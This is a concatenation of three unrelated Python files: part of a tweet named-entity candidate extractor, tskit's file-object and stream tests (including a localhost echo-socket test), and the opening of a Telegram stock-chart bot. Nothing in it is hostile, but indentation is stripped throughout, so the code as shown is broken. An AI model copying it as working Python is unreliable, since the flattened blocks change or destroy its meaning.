ne_phrase.set_feature(ne.has_number,flag1)
ne_phrase.set_feature(ne.date_indicator,flag3)
ne_phrase.set_date_num_holder(date_num_holder)
return ne_phrase
# In[312]:
#removing commonly used expletives, enunciated chat words and other common words (like days of the week, common expressions)
def slang_remove(self,ne_phrase):
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
p1= re.compile(r'([A-Za-z]+)\1\1{1,}')
match_lst = p1.findall(phrase)
if phrase in article_list:
return True
elif phrase in day_list:
return True
#elif phrase in month_list:
#return True
elif match_lst:
return True
else:
return False
# In[313]:
def apostrope_check(self,ne_phrase):
apostrophe="'s"
bad_apostrophe="’s"
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
if (apostrophe in phrase):
if (phrase.endswith(apostrophe)):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(apostrophe))
elif (bad_apostrophe in phrase):
if phrase.endswith(bad_apostrophe):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(bad_apostrophe))
else:
ne_phrase.set_feature(ne.is_apostrophed,-1)
return ne_phrase
# In[314]:
def punctuation_check(self,ne_phrase):
holder=[]
punctuation_holder=[]
flag_holder=[]
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
for i in range(len(phrase)):
if (phrase[i] in string.punctuation):
holder+=[i]
for i in holder:
if ((i<(len(phrase)-1)) & (phrase[i]=="'") & (phrase[i+1]=="s")):
flag_holder+=[False]
elif ((i==(len(phrase)-1)) & (phrase[i]=="'")):
flag_holder+=[False]
else:
flag_holder+=[True]
punctuation_holder+=[i]
#print(flag_holder)
ne_phrase.set_punctuation_holder(punctuation_holder)
if True in flag_holder:
ne_phrase.set_feature(ne.has_intermediate_punctuation,True)
else:
ne_phrase.set_feature(ne.has_intermediate_punctuation,False)
return ne_phrase
# In[315]:
def tense_check(self,ne_phrase):
words=(((ne_phrase.phraseText.strip()).rstrip(string.punctuation)).lower()).split()
verb_flag=False
adverb_flag=False
if (len(words)==1):
if words[0].endswith("ing"):
verb_flag=True
if words[0].endswith("ly"):
adverb_flag=True
ne_phrase.set_feature(ne.ends_like_verb,verb_flag)
ne_phrase.set_feature(ne.ends_like_adverb,adverb_flag)
return ne_phrase
# In[316]:
def capitalization_change(self,ne_element):
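        # Record the position where the capitalization pattern switches (e.g. an ALL-CAPS prefix
        # followed by Title Case words, as in "BREAKING: Toronto Raptors"), and flag
        # has_topic_indicator when such a phrase contains a colon.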
phrase=((ne_element.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()
val=-1
topic_indicator=False
p1= re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+[A-Za-z]+') #BREAKING: Toronto Raptors
p2= re.compile(r'([A-Z]{1}[a-z]+)+[^A-Za-z]*\s+[A-Z]{4,}') #The DREAMIEST LAND
match_lst1 = p1.findall(phrase)
match_lst2 = p2.findall(phrase)
if (match_lst1):
if not phrase.isupper():
p3=re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+')
val=list(p3.finditer(phrase))[-1].span()[1]
if(":" in phrase):
topic_indicator=True
ne_element.set_feature(ne.change_in_capitalization,val)
elif (match_lst2):
#print ("GOTIT2: "+phrase)
p3=re.compile(r'([A-Z]{1}[a-z]+)+')
val=list(p3.finditer(phrase))[-1].span()[1]
ne_element.set_feature(ne.change_in_capitalization,val)
else:
ne_element.set_feature(ne.change_in_capitalization,val)
ne_element.set_feature(ne.has_topic_indicator,topic_indicator)
return ne_element
def quoteProcess(self,unitQuoted, tweetWordList):
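        # Split a run of consecutively capitalized tokens into quoted and unquoted sub-units:
        # rebuild the phrase, look for balanced ', ‘…’, “…” or " pairs that stand alone as words,
        # and return a list of (token-index list, is_quoted) pairs.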
candidateString=""
retList=[]
matches=[]
quoteMatch=[]
final=[]
flag=False
#print(tweetWordList)
list1=list(map(lambda index: tweetWordList[index], unitQuoted))
candidateString=" ".join(list1)
#print("=>",candidateString)
# candidateString=""
# for index in range(len(unitQuoted)-1):
# candidateString+=tweetWordList[unitQuoted[index]]+" "
# candidateString+=tweetWordList[unitQuoted[-1]]
# print("=>",candidateString)
flagOne=False
flagTwo=False
flagThree=False
flagFour=False
p= re.compile(r'[^\S]*([\'].*?[\'])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\'].*?[\'])[^\s]*')
p2=re.compile(r'[^\s]*([\'].*?[\'])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagOne=True
if(not flagOne):
p= re.compile(r'[^\S]*([‘].*?[’])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([‘].*?[’])[^\s]*')
p2=re.compile(r'[^\s]*([‘].*?[’])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagTwo=True
if((not flagOne)&(not flagTwo)):
p= re.compile(r'[^\S]*([“].*?[”])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([“].*?[”])[^\s]*')
p2=re.compile(r'[^\s]*([“].*?[”])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagThree=True
if((not flagOne)&(not flagTwo)&(not flagThree)):
p= re.compile(r'[^\S]*([\"].*?[\"])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\"].*?[\"])[^\s]*')
p2=re.compile(r'[^\s]*([\"].*?[\"])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagFour=True
if (flagOne|flagTwo|flagThree|flagFour):
flag=True
for index in indices:
span= list(index.span())
#print(span[0])
quoteMatch.append([int(span[0]),int(span[1])])
matches+=[int(span[0]),int(span[1])]
#print(matches)
final+=[(candidateString[0:matches[0]],False)]
for i in range(len(matches)-1):
if([matches[i],matches[i+1]] in quoteMatch):
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),True)]
else:
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),False)]
final+=[(candidateString[matches[-1]:],False)]
final=list(filter(lambda strin: strin[0]!="",final))
final=list(map(lambda strin: (strin[0].strip(),strin[1]),final))
#print(final)
for unit in final:
lst=[]
unitsplit=list(filter(lambda unitString: unitString!='',unit[0].split()))
for splitunit in unitsplit:
lst+=[tweetWordList.index(splitunit,unitQuoted[0])]
retList+=[(lst,unit[1])]
else:
retList+=[(unitQuoted,False)]
#print(retList)
return retList
# In[318]:
def trueEntity_process(self,tweetWordList_cappos,tweetWordList):
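        # Full candidate extraction for one sentence: find runs of capitalized tokens, split them at
        # quotes, drop embedded stopwords, apply the punctuation clause and abbreviation check, then
        # filter on stopwords, slang, pure numbers, length (<7 tokens) and single characters.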
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#returns list with position of consecutively capitalized words
#print(tweetWordList_cappos, tweetWordList)
output_unfiltered = self.consecutive_cap(tweetWordList_cappos,tweetWordList)
#print("==>",output_unfiltered)
#splitting at quoted units
output_quoteProcessed=[]
start_quote=[]
end_quote=[]
for unitQuoted in output_unfiltered:
unitout=self.quoteProcess(unitQuoted, tweetWordList)
#print("==>",unitout)
for elem in unitout:
mod_out=[]
out=elem[0]
flag=elem[1]
sflag=False
# '’”"
#print(out,flag)
if not (flag):
#for id in range(len(out)):
temp=[]
#print("::",out)
for index in out:
#print(index,tweetWordList[index])
word=(((tweetWordList[index].strip().strip('"“‘’”"')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print("=>"+word)"“‘’”"
if (word):
if (word in combined):
if(len(out)==1):
temp.append(index)
else:
if (word not in prep_list)&(word not in article_list):
temp.append(index)
else:
sflag=True
#else:
#if ((index==0)||()):
#temp.append(index)
# else:
# print("here")
# else:
# print("here")
#print(temp)
for elem in temp:
out.remove(elem)
#out[id]=temp
lst=[]
for k, g in groupby(enumerate(out), lambda elem: elem[1]-elem[0]):
lst=list(map(itemgetter(1), g))
#print("==>",lst)
if(lst):
mod_out.append((lst,sflag,flag))
#print('==>',mod_out)
else:
mod_out=[(out,sflag,flag)]
#print(mod_out)
#print(mod_out)
if(mod_out):
output_quoteProcessed.extend(mod_out)
        #print("=====>",output_quoteProcessed)
output= list(filter(lambda element: ((element[0]!=[0])&(element[0]!=[])), output_quoteProcessed))
#print(output)
#consecutive capitalized phrases
consecutive_cap_phrases1=list(map(lambda x: self.f(x[0],x[1],x[2],tweetWordList), output))
consecutive_cap_phrases=list(filter(lambda candidate:(candidate.phraseText!="JUST_DIGIT_ERROR"),consecutive_cap_phrases1))
#self.printList(consecutive_cap_phrases)
#implement the punctuation clause
ne_List_pc=self.flatten(list(map(lambda NE_phrase: self.punct_clause(NE_phrase), consecutive_cap_phrases)),[])
#self.printList(ne_List_pc)
#stopword removal and start-of-sentence
ne_List_pc_sr= list(map(lambda candidate: self.stopwordReplace(candidate), ne_List_pc))
#self.printList(ne_List_pc_sr)
ne_List_pc_checked= list(filter(lambda candidate: ((candidate.phraseText!="")&(candidate.position!=[0])), ne_List_pc_sr))
#implement title detection
#ne_List_titleCheck= list(map(lambda element: self.title_check(element), ne_List_pc_checked))
#implement slang check and remove
ne_List_slangCheck= list(filter(lambda element: not self.slang_remove(element), ne_List_pc_checked))
#implement apostrophe, tense and punctuation marker with final number check
#ne_List_apostropeCheck= list(map(lambda element: self.apostrope_check(element), ne_List_slangCheck))
#ne_List_punctuationCheck= list(map(lambda element: self.punctuation_check(element), ne_List_apostropeCheck))
ne_List_numCheck=list(filter(lambda candidate: not (candidate.phraseText.lstrip(string.punctuation).rstrip(string.punctuation).strip()).isdigit(), ne_List_slangCheck))
#ne_List_tenseCheck= list(map(lambda element: self.tense_check(element), ne_List_numCheck))
#tracking sudden change in capitalization pattern
#ne_List_capPatCheck= list(map(lambda element: self.capitalization_change(element), ne_List_tenseCheck))
#check on length
ne_List_lengthCheck= list(filter(lambda element: element.length<7, ne_List_numCheck))
ne_List_badWordCheck= list(filter(lambda element:((element.phraseText.strip().strip(string.punctuation).lstrip('“‘’”')).rstrip('“‘’”').lower()) not in combined, ne_List_lengthCheck))
ne_List_allCheck= list(filter(lambda element:(len((element.phraseText.strip().strip(string.punctuation).lstrip('“‘’”')).rstrip('“‘’”'))>1),ne_List_badWordCheck))
#ne_List_allCheck= list(filter(lambda element: (element.phraseText.lower() not in combined), ne_List_double_Check))
#q.put(ne_List_allCheck)
return ne_List_allCheck
#return ne_List_allCheck
# In[319]:
'''This is the main module. It is not written as an explicit function because the argument format is not
fixed yet; however, this whole cell can be called as a function and it will invoke the rest of the
functions in the module to extract candidates and their features.
'''
'''#reads input from the database file and converts it to a dataframe. This part can be changed to
#convert the argument tuple to the dataframe directly'''
#Inputs: Collection.csv 500Sample.csv 3.2KSample.csv eric_trump.csv
#df_out.to_csv('TweetBase500.csv')
#--------------------------------------PHASE I---------------------------------------------------
# In[ ]:
#--------------------------------------PHASE II---------------------------------------------------
'''set1 = set(['Melania','Trump'])
set2 = set(['Donald','Trump'])
set3 = set(['Jared','Kushner'])
m1 = MinHash(num_perm=200)
m2 = MinHash(num_perm=200)
m3 = MinHash(num_perm=200)
for d in set1:
m1.update(d.encode('utf8'))
for d in set2:
m2.update(d.encode('utf8'))
for d in set3:
m3.update(d.encode('utf8'))
# Create LSH index
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
lsh.insert("m3", m3)
result = lsh.query(m1)
print("Approximate neighbours with Jaccard similarity", result)
candidates=["donald trump","melania trump", "obama","barack obama","barack"]
listofMinhash=[]
m=MinHash(num_perm=200)
candidate0=set(candidates[0].split())
for d in candidate0:
m.update(d.encode('utf8'))
listofMinhash.append(m)
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
for candidate in candidates[1:]:'''
# In[ ]:
'''
print ("Shingling articles...")
# The current shingle ID value to assign to the next new shingle we
# encounter. When a shingle gets added to the dictionary, we'll increment this
# value.
curShingleID = 0
# Create a dictionary of the articles, mapping the article identifier (e.g.,
# "t8470") to the list of shingle IDs that appear in the document.
candidatesAsShingleSets = {};
candidateNames = []
t0 = time.time()
totalShingles = 0
for k in range(0, len(sorted_NE_container.keys())):
# Read all of the words (they are all on one line) and split them by white space.
words = list(sorted_NE_container.keys())[k].split(" ")
# Retrieve the article ID, which is the first word on the line.
candidateID = k
# Maintain a list of all document IDs.
candidateNames.append(candidateID)
# 'shinglesInDoc' will hold all of the unique shingle IDs present in the current document.
#If a shingle ID occurs multiple times in the document,
# it will only appear once in the set (this is a property of Python sets).
shinglesInCandidate = set()
# For each word in the document...
for index in range(0, len(words)):
# Construct the shingle text by combining three words together.
shingle = words[index]
# Hash the shingle to a 32-bit integer.
#crc = binascii.crc32("")
crc = binascii.crc32(bytes(shingle, encoding="UTF-8")) & (0xffffffff)
# Add the hash value to the list of shingles for the current document.
# Note that set objects will only add the value to the set if the set
# doesn't already contain it.
shinglesInCandidate.add(crc)
# Store the completed list of shingles for this document in the dictionary.
#print(str(words)+": ")
#for i in shinglesInCandidate:
# print('0x%08x' %i)
candidatesAsShingleSets[candidateID] = shinglesInCandidate
# Count the number of shingles across all documents.
totalShingles = totalShingles + (len(words))
# Report how long shingling took.
print ('\nShingling ' + str(str(len(sorted_NE_container.keys()))) + ' candidates took %.2f sec.' % (time.time() - t0))
print ('\nAverage shingles per doc: %.2f' % (totalShingles / len(sorted_NE_container.keys())))
'''
# In[ ]:
'''
# =============================================================================
# Generate MinHash Signatures
# =============================================================================
numHashes=20
numCandidates=len(sorted_NE_container.keys())
# Time this step.
t0 = time.time()
print ('Generating random hash functions...')
# Record the maximum shingle ID that we assigned.
maxShingleID = 2**32-1
nextPrime = 4294967311
# Our random hash function will take the form of:
# h(x) = (a*x + b) % c
# Where 'x' is the input value, 'a' and 'b' are random coefficients, and 'c' is
# a prime number just greater than maxShingleID.
# Generate a list of 'k' random coefficients for the random hash functions,
# while ensuring that the same value does not appear multiple times in the
# list.
def pickRandomCoeffs(k):
# Create a list of 'k' random values.
randList = []
while k > 0:
# Get a random shingle ID.
randIndex = random.randint(0, maxShingleID)
# Ensure that each random number is unique.
while randIndex in randList:
randIndex = random.randint(0, maxShingleID)
# Add the random number to the list.
randList.append(randIndex)
k = k - 1
return randList
# For each of the 'numHashes' hash functions, generate a different coefficient 'a' and 'b'.
coeffA = pickRandomCoeffs(numHashes)
coeffB = pickRandomCoeffs(numHashes)
print ('\nGenerating MinHash signatures for all candidates...')
# List of documents represented as signature vectors
signatures =np.ndarray(shape=(20, numCandidates))
# Rather than generating a random permutation of all possible shingles,
# we'll just hash the IDs of the shingles that are *actually in the document*,
# then take the lowest resulting hash code value. This corresponds to the index
# of the first shingle that you would have encountered in the random order.
# For each document...
for candidateID in candidateNames:
# Get the shingle set for this document.
shingleIDSet = candidatesAsShingleSets[candidateID]
# The resulting minhash signature for this document.
signature = []
# For each of the random hash functions...
for i in range(0, numHashes):
# For each of the shingles actually in the document, calculate its hash code
# using hash function 'i'.
# Track the lowest hash ID seen. Initialize 'minHashCode' to be greater than
# the maximum possible value output by the hash.
minHashCode = nextPrime + 1
# For each shingle in the document...
for shingleID in shingleIDSet:
# Evaluate the hash function.
hashCode = (coeffA[i] * shingleID + coeffB[i]) % nextPrime
# Track the lowest hash code seen.
if hashCode < minHashCode:
minHashCode = hashCode
# Add the smallest hash code value as component number 'i' of the signature.
signature.append(minHashCode)
# Store the MinHash signature for this document.
#signatures.append(signature)
signatures[:,candidateID]=signature
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print(list(np.shape(signatures)))
print ("\nGenerating MinHash signatures took %.2fsec" % elapsed)
#print ('\nsignatures stored in a numpy array...')
# Creates a N x N matrix initialized to 0.
# Time this step.
t0 = time.time()
# For each of the test documents...
for i in range(10, 11):
#for i in range(0, numCandidates):
print(list(sorted_NE_container.keys())[i]+": ",end="")
# Get the MinHash signature for document i.
signature1 = signatures[i]
# For each of the other test documents...
for j in range(0, numCandidates):
if(j!=i):
# Get the MinHash signature for document j.
signature2 = signatures[j]
count = 0
# Count the number of positions in the minhash signature which are equal.
for k in range(0, numHashes):
count = count + (signature1[k] == signature2[k])
# Record the percentage of positions which matched.
estJSim= (count / numHashes)
#print(estJSim)
if (estJSim>=0.5):
print("=>"+list(sorted_NE_container.keys())[j]+", ",end="")
print()
# Calculate the elapsed time (in seconds)
elapsed = (time.time() - t0)
print ("\nComparing MinHash signatures took %.2fsec" % elapsed)'''
# In[ ]:
'''cap_phrases="Trump:Russia,Afgha"
words=re.split('[,:]', cap_phrases)
print(words)
candidateString='"BS'
p= re.compile(r'(".*?")[^\s]*[\s]*')
indices= (list( p.finditer(candidateString) ))
matches=[]
final=[]
if(indices):
for index in indices:
span= list(index.span())
#print(span[0])
matches+=[int(span[0]),int(span[1])]
print(matches)
final+=[candidateString[0:matches[0]]]
for i in range(len(matches)-1):
final+=[(candidateString[matches[i]:matches[i+1]]).strip()]
final+=[candidateString[matches[-1]:]]
final=list(filter(lambda strin: strin!="",final))
final=list(map(lambda strin: strin.strip(),final))
print(final)'''
# tweets=pd.read_csv("deduplicated_test.csv", header=0, index_col = 0 ,encoding = 'utf-8',delimiter=';')
# tweets=tweets[:1000:]
# Phase1= SatadishaModule()
# for i in range(2):
# Phase1= SatadishaModule()
# Phase1.extract(tweets,1)
|
test_fileobj.py
|
# MIT License
#
# Copyright (c) 2018-2020 Tskit Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Test cases for loading and dumping different types of files and streams
"""
import io
import multiprocessing
import os
import pathlib
import platform
import queue
import shutil
import socket
import socketserver
import tempfile
import traceback
import pytest
from pytest import fixture
import tskit
IS_WINDOWS = platform.system() == "Windows"
IS_OSX = platform.system() == "Darwin"
class TestPath:
@fixture
def tempfile_name(self):
with tempfile.TemporaryDirectory() as tmp_dir:
yield f"{tmp_dir}/plain_path"
def test_pathlib(self, ts_fixture, tempfile_name):
ts_fixture.dump(tempfile_name)
ts2 = tskit.load(tempfile_name)
assert ts_fixture.tables == ts2.tables
class TestPathLib:
@fixture
def pathlib_tempfile(self):
fd, path = tempfile.mkstemp(prefix="tskit_test_pathlib")
os.close(fd)
temp_file = pathlib.Path(path)
yield temp_file
temp_file.unlink()
def test_pathlib(self, ts_fixture, pathlib_tempfile):
ts_fixture.dump(pathlib_tempfile)
ts2 = tskit.load(pathlib_tempfile)
assert ts_fixture.tables == ts2.tables
class TestFileObj:
@fixture
def fileobj(self):
with tempfile.TemporaryDirectory() as tmp_dir:
with open(f"{tmp_dir}/fileobj", "wb") as f:
yield f
def test_fileobj(self, ts_fixture, fileobj):
ts_fixture.dump(fileobj)
fileobj.close()
ts2 = tskit.load(fileobj.name)
assert ts_fixture.tables == ts2.tables
def test_fileobj_multi(self, replicate_ts_fixture, fileobj):
file_offsets = []
for ts in replicate_ts_fixture:
ts.dump(fileobj)
file_offsets.append(fileobj.tell())
fileobj.close()
with open(fileobj.name, "rb") as f:
for ts, file_offset in zip(replicate_ts_fixture, file_offsets):
ts2 = tskit.load(f)
file_offset2 = f.tell()
assert ts.tables == ts2.tables
assert file_offset == file_offset2
class TestFileObjRW:
@fixture
def fileobj(self):
with tempfile.TemporaryDirectory() as tmp_dir:
pathlib.Path(f"{tmp_dir}/fileobj").touch()
with open(f"{tmp_dir}/fileobj", "r+b") as f:
yield f
def test_fileobj(self, ts_fixture, fileobj):
ts_fixture.dump(fileobj)
fileobj.seek(0)
ts2 = tskit.load(fileobj)
assert ts_fixture.tables == ts2.tables
def test_fileobj_multi(self, replicate_ts_fixture, fileobj):
file_offsets = []
for ts in replicate_ts_fixture:
ts.dump(fileobj)
file_offsets.append(fileobj.tell())
fileobj.seek(0)
for ts, file_offset in zip(replicate_ts_fixture, file_offsets):
ts2 = tskit.load(fileobj)
file_offset2 = fileobj.tell()
assert ts.tables == ts2.tables
assert file_offset == file_offset2
class TestFD:
@fixture
def fd(self):
with tempfile.TemporaryDirectory() as tmp_dir:
pathlib.Path(f"{tmp_dir}/fd").touch()
with open(f"{tmp_dir}/fd", "r+b") as f:
yield f.fileno()
def test_fd(self, ts_fixture, fd):
ts_fixture.dump(fd)
os.lseek(fd, 0, os.SEEK_SET)
ts2 = tskit.load(fd)
assert ts_fixture.tables == ts2.tables
def test_fd_multi(self, replicate_ts_fixture, fd):
for ts in replicate_ts_fixture:
ts.dump(fd)
os.lseek(fd, 0, os.SEEK_SET)
for ts in replicate_ts_fixture:
ts2 = tskit.load(fd)
assert ts.tables == ts2.tables
class TestUnsupportedObjects:
def test_string_io(self, ts_fixture):
with pytest.raises(io.UnsupportedOperation, match=r"fileno"):
ts_fixture.dump(io.StringIO())
with pytest.raises(io.UnsupportedOperation, match=r"fileno"):
tskit.load(io.StringIO())
with pytest.raises(io.UnsupportedOperation, match=r"fileno"):
ts_fixture.dump(io.BytesIO())
with pytest.raises(io.UnsupportedOperation, match=r"fileno"):
tskit.load(io.BytesIO())
def dump_to_stream(q_err, q_in, file_out):
"""
Get tree sequences from `q_in` and ts.dump() them to `file_out`.
Uncaught exceptions are placed onto the `q_err` queue.
"""
try:
with open(file_out, "wb") as f:
while True:
ts = q_in.get()
if ts is None:
break
ts.dump(f)
except Exception as exc:
tb = traceback.format_exc()
q_err.put((exc, tb))
def load_from_stream(q_err, q_out, file_in):
"""
tskit.load() tree sequences from `file_in` and put them onto `q_out`.
Uncaught exceptions are placed onto the `q_err` queue.
"""
try:
with open(file_in, "rb") as f:
while True:
try:
ts = tskit.load(f)
except EOFError:
break
q_out.put(ts)
except Exception as exc:
tb = traceback.format_exc()
q_err.put((exc, tb))
def stream(fifo, ts_list):
"""
data -> q_in -> ts.dump(fifo) -> tskit.load(fifo) -> q_out -> data_out
"""
q_err = multiprocessing.Queue()
q_in = multiprocessing.Queue()
q_out = multiprocessing.Queue()
proc1 = multiprocessing.Process(target=dump_to_stream, args=(q_err, q_in, fifo))
proc2 = multiprocessing.Process(target=load_from_stream, args=(q_err, q_out, fifo))
proc1.start()
proc2.start()
for data in ts_list:
q_in.put(data)
q_in.put(None) # signal the process that we're done
proc1.join(timeout=3)
if not q_err.empty():
# re-raise the first child exception
exc, tb = q_err.get()
print(tb)
raise exc
if proc1.is_alive():
# prevent hang if proc1 failed to join
proc1.terminate()
proc2.terminate()
raise RuntimeError("proc1 (ts.dump) failed to join")
ts_list_out = []
for _ in ts_list:
try:
data_out = q_out.get(timeout=3)
except queue.Empty:
# terminate proc2 so we don't hang
proc2.terminate()
raise
ts_list_out.append(data_out)
proc2.join(timeout=3)
if proc2.is_alive():
# prevent hang if proc2 failed to join
proc2.terminate()
raise RuntimeError("proc2 (tskit.load) failed to join")
assert len(ts_list) == len(ts_list_out)
for ts, ts_out in zip(ts_list, ts_list_out):
assert ts.tables == ts_out.tables
@pytest.mark.skipif(IS_WINDOWS, reason="No FIFOs on Windows")
class TestFIFO:
@fixture
def fifo(self):
temp_dir = tempfile.mkdtemp(prefix="tsk_test_streaming")
temp_fifo = os.path.join(temp_dir, "fifo")
os.mkfifo(temp_fifo)
yield temp_fifo
shutil.rmtree(temp_dir)
def test_single_stream(self, fifo, ts_fixture):
stream(fifo, [ts_fixture])
def test_multi_stream(self, fifo, replicate_ts_fixture):
stream(fifo, replicate_ts_fixture)
ADDRESS = ("localhost", 10009)
class Server(socketserver.ThreadingTCPServer):
allow_reuse_address = True
class StoreEchoHandler(socketserver.BaseRequestHandler):
def handle(self):
while True:
try:
ts = tskit.load(self.request.fileno())
except EOFError:
break
ts.dump(self.request.fileno())
self.server.shutdown()
def server_process(q):
server = Server(ADDRESS, StoreEchoHandler)
# Tell the client (on the other end of the queue) that it's OK to open
# a connection
q.put(None)
server.serve_forever()
@pytest.mark.skipif(IS_WINDOWS or IS_OSX, reason="Errors on systems without proper fds")
class TestSocket:
@fixture
def client_fd(self):
# Use a queue to synchronise the startup of the server and the client.
q = multiprocessing.Queue()
_server_process = multiprocessing.Process(target=server_process, args=(q,))
_server_process.start()
q.get(timeout=3)
client = socket.create_connection(ADDRESS)
yield client.fileno()
client.close()
_server_process.join(timeout=3)
def verify_stream(self, ts_list, client_fd):
for ts in ts_list:
ts.dump(client_fd)
echo_ts = tskit.load(client_fd)
assert ts.tables == echo_ts.tables
def test_single_then_multi(self, ts_fixture, replicate_ts_fixture, client_fd):
self.verify_stream([ts_fixture], client_fd)
self.verify_stream(replicate_ts_fixture, client_fd)
|
tickergram.py
|
#!/usr/bin/env python3
import time, sys, os, uuid, tempfile, re, subprocess, json, logging, datetime, multiprocessing, threading, argparse, shutil
import requests
import yfinance as yf
import mplfinance as mpf
import redis
import pandas as pd
#import talib
import locale
locale.setlocale(locale.LC_ALL, "en_US.utf8")
class tickergram:
def __init__(self, tg_token, redis_host, redis_port, redis_db, password="", allow_commands=[]):
# Configuration
self.BOT_PASSWORD = password
self.BOT_ENABLED_PASS = True if password else False
self.REDIS_HOST = redis_host
self.REDIS_PORT = redis_port
self.REDIS_DB = redis_db
self.ALLOW_COMMANDS = allow_commands
self.TG_API="https://api.telegram.org/bot" + tg_token
self.MAX_CHART_RANGE = datetime.timedelta(days=3*365) # 3 years
self.POLLING_TIMEOUT = 600
# Configure logging
self.logger = logging.getLogger("tickergram_log")
self.logger.setLevel(logging.DEBUG)
logger_fh = logging.FileHandler("tickergram.log")
logger_fh.setLevel(logging.DEBUG)
logger_ch = logging.StreamHandler()
logger_ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(message)s")
logger_fh.setFormatter(formatter)
logger_ch.setFormatter(formatter)
self.logger.addHandler(logger_fh)
self.logger.addHandler(logger_ch)
# Anti flood protection
self.antiflood_cache = {}
self.ANTI_FLOOD_SECS = 1
def tg_getme(self):
r = requests.get(self.TG_API+"/getMe")
d = r.json()
if not d["ok"]:
return False
return d
def tg_send_msg(self, text, chat_id):
d = {"chat_id": chat_id, "text": text, "parse_mode": "MarkdownV2", "disable_web_page_preview": True}
r = requests.get(self.TG_API+"/sendMessage", params=d)
d = r.json()
if not d["ok"]:
return False
return d
def tg_send_msg_post(self, text, chat_id):
d = {"chat_id": chat_id, "text": text, "parse_mode": "MarkdownV2", "disable_web_page_preview": True}
r = requests.post(self.TG_API+"/sendMessage", params=d)
d = r.json()
if not d["ok"]:
return False
return d
def tg_chat_exists(self, chat_id):
d = {"chat_id": chat_id}
r = requests.get(self.TG_API+"/getChat", params=d)
d = r.json()
if d["ok"]:
return True
elif not d["ok"] and d["error_code"] == 400:
return False
else:
raise RuntimeError("tg_chat_exists not ok")
def tg_delete_msg(self, tg_message):
d = {"chat_id": tg_message["chat"]["id"], "message_id": tg_message["message_id"]}
r = requests.get(self.TG_API+"/deleteMessage", params=d)
d = r.json()
if not d["ok"]:
raise RuntimeError("tg_delete_msg not ok")
return d
def tg_send_pic(self, f, chat_id):
d = {"chat_id": chat_id}
r = requests.post(self.TG_API+"/sendPhoto", data=d, files={"photo": open(f, "rb")})
d = r.json()
if not d["ok"]:
raise RuntimeError("tg_send_pic not ok")
return d
def tg_get_messages(self, offset=0, limit=1):
d = {"timeout": self.POLLING_TIMEOUT, "allowed_updates": ["message"], "limit": limit}
if offset:
d["offset"] = offset
r = requests.get(self.TG_API+"/getUpdates", params=d, timeout=self.POLLING_TIMEOUT+30)
d = r.json()
if not d["ok"]:
raise RuntimeError("tg_get_messages not ok")
return d
def tg_send_action(self, chat_id, action="typing"):
d = {"chat_id": chat_id, "action": action}
r = requests.post(self.TG_API+"/sendChatAction", data=d)
d = r.json()
if not d["ok"]:
raise RuntimeError("tg_send_action not ok")
return d
def tg_start_action(self, chat_id, action="typing"):
# Wrapper for tg_send_action that sends the action
# in intervals on different threads using threading.Timer
self.tg_send_action(chat_id, action=action)
# Recursive call to setup the Timer every 5 seconds
t = threading.Timer(5.0, self.tg_start_action, kwargs={"chat_id": chat_id, "action": action})
t.daemon = True
t.start()
def redis_get_db(self):
return redis.Redis(host=self.REDIS_HOST,
port=self.REDIS_PORT, db=self.REDIS_DB)
def redis_ping(self):
try:
return self.redis_get_db().ping()
except:
return False
def redis_add_chat_auth(self, chat_id):
r = self.redis_get_db()
